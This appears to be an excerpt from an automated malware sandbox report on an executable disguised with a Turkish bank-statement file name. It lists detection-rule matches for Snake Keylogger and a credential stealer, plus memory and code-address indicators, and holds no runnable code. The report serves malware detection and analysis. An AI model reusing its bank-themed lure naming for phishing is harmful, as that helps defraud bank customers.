          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 6640, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 6640, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 7124, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 7124, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 0_2_00FCDE4C0_2_00FCDE4C
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_0191C1903_2_0191C190
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_019161083_2_01916108
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_019195403_2_01919540
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_0191B4A03_2_0191B4A0
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_0191C4703_2_0191C470
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_019167303_2_01916730
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_0191C7533_2_0191C753
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_0191BBD33_2_0191BBD3
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_01914AD93_2_01914AD9
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_0191CA333_2_0191CA33
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_0191BEB03_2_0191BEB0
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_019135733_2_01913573
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_0191B4F33_2_0191B4F3
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F354883_2_06F35488
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F30B303_2_06F30B30
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3A0D03_2_06F3A0D0
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F318483_2_06F31848
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F329C83_2_06F329C8
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F399A83_2_06F399A8
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3E6B63_2_06F3E6B6
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3E6B83_2_06F3E6B8
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3DE083_2_06F3DE08
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F38FF03_2_06F38FF0
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F397883_2_06F39788
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3EF683_2_06F3EF68
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3EF583_2_06F3EF58
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F31CA83_2_06F31CA8
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F31C993_2_06F31C99
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F354783_2_06F35478
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3DDF93_2_06F3DDF9
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F325683_2_06F32568
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3D5583_2_06F3D558
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F325583_2_06F32558
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3D5483_2_06F3D548
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3E2603_2_06F3E260
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3E2503_2_06F3E250
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3F3C03_2_06F3F3C0
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3F3B13_2_06F3F3B1
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3EB103_2_06F3EB10
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F30B1F3_2_06F30B1F
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3EB013_2_06F3EB01
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F320F93_2_06F320F9
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3D0EF3_2_06F3D0EF
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3A0683_2_06F3A068
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F300403_2_06F30040
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F318383_2_06F31838
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3F8183_2_06F3F818
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F390003_2_06F39000
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F300063_2_06F30006
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3F8093_2_06F3F809
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3D9B03_2_06F3D9B0
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F329B83_2_06F329B8
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3D9A13_2_06F3D9A1
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3D1003_2_06F3D100
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F321083_2_06F32108
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1741437321.0000000003A63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1739949343.00000000009DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000000.1694179501.00000000004E4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRRye.exeD vs ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748781541.0000000007220000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1741070002.0000000002861000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4152159317.0000000000422000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4152340010.0000000001337000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeBinary or memory string: OriginalFilenameRRye.exeD vs ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 3.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 3.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 3.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 3.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 6640, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 6640, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 7124, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 7124, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, Z.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, Z.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, Z.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, Z.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
